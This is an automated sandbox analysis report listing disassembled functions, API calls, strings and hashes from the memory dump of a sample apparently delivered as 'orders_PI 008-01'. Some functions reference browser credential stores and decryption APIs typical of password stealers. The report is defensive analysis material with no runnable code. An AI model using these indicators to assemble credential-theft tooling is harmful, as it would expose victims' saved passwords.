                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                        • API String ID: 2929817778-1134094380
                                        • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                        • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                        Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                        • String ID: :stringdata$ftp://$http://$https://
                                        • API String ID: 2787044678-1921111777
                                        • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                        • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                        Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                        • GetDC.USER32 ref: 004140E3
                                        • wcslen.MSVCRT ref: 00414123
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                        • _snwprintf.MSVCRT ref: 00414244
                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 2080319088-3046471546
                                        • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                        • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                        Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00413221
                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                        • memset.MSVCRT ref: 00413292
                                        • memset.MSVCRT ref: 004132B4
                                        • memset.MSVCRT ref: 004132CD
                                        • memset.MSVCRT ref: 004132E1
                                        • memset.MSVCRT ref: 004132FB
                                        • memset.MSVCRT ref: 00413310
                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                        • memset.MSVCRT ref: 004133C0
                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                        • wcscpy.MSVCRT ref: 0041341F
                                        • _snwprintf.MSVCRT ref: 0041348E
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                        • SetFocus.USER32(00000000), ref: 004134B7
                                        Strings
                                        • {Unknown}, xrefs: 004132A6
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                        • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                        Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                        • EndDialog.USER32(?,?), ref: 0040135E
                                        • DeleteObject.GDI32(?), ref: 0040136A
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                        • ShowWindow.USER32(00000000), ref: 00401398
                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID:
                                        • API String ID: 829165378-0
                                        • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                        • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                        Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00404172
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • wcscpy.MSVCRT ref: 004041D6
                                        • wcscpy.MSVCRT ref: 004041E7
                                        • memset.MSVCRT ref: 00404200
                                        • memset.MSVCRT ref: 00404215
                                        • _snwprintf.MSVCRT ref: 0040422F
                                        • wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 0040426E
                                        • memset.MSVCRT ref: 004042CD
                                        • memset.MSVCRT ref: 004042E2
                                        • _snwprintf.MSVCRT ref: 004042FE
                                        • wcscpy.MSVCRT ref: 00404311
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                        • API String ID: 2454223109-1580313836
                                        • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                        • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                        Function 0041352F Relevance: 33.3, APIs: 9, Strings: 10, Instructions: 41libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+Fw@FFw@BFw
                                        • API String ID: 667068680-2648589930
                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                        Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                        • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                        • API String ID: 4054529287-3175352466
                                        • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                        • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                        Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 3143752011-1996832678
                                        • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                        • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                        • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                        • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                        Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 1607361635-601624466
                                        • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                        • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                        • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                        • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                        Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                        • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                        Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1043902810-0
                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                        Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                        • _snwprintf.MSVCRT ref: 0044488A
                                        • wcscpy.MSVCRT ref: 004448B4
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@_snwprintfwcscpy
                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                        • API String ID: 2899246560-1542517562
                                        • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                        • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                        Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040DBCD
                                        • memset.MSVCRT ref: 0040DBE9
